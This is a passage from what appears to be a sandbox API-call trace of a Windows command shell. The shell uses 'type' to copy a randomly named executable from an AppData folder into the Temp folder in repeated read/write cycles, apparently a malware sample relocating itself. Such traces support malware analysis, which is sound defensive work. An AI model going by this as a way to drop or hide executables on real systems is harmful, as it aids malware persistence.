(_FileHandle=1) returned 3 [0174.033] _close (_FileHandle=1) returned 0 [0174.033] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", _String2="con") returned -53 [0174.033] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18fbcc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0174.034] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0174.034] GetConsoleTitleW (in: lpConsoleTitle=0x18f9fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.099] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0174.099] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0174.099] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0174.099] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0174.099] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.100] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18f560, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f560) returned 0x320f58 [0174.100] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0174.100] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0174.100] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0174.100] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e46c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0174.100] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] GetFileType (hFile=0x54) returned 0x1 [0174.100] _get_osfhandle (_FileHandle=4) 
returned 0x54 [0174.100] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e4c4 | out: lpFileSizeHigh=0x18e4c4*=0x0) returned 0x7d600 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0174.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.100] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.101] GetFileType (hFile=0x4c) returned 0x1 [0174.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.101] GetFileType (hFile=0x4c) returned 0x1 [0174.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.101] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) 
returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] GetFileType (hFile=0x4c) returned 0x1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.103] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.104] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.104] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.104] GetFileType (hFile=0x4c) returned 0x1 [0174.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, 
lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.105] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] GetFileType (hFile=0x4c) returned 0x1 [0174.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.105] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.106] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.106] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] GetFileType (hFile=0x4c) returned 0x1 [0174.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.106] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.107] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.107] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, 
lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] GetFileType (hFile=0x4c) returned 0x1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.107] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 
| out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.108] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.108] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] GetFileType (hFile=0x4c) returned 0x1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.108] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.109] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.109] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] GetFileType (hFile=0x4c) returned 0x1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.109] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 
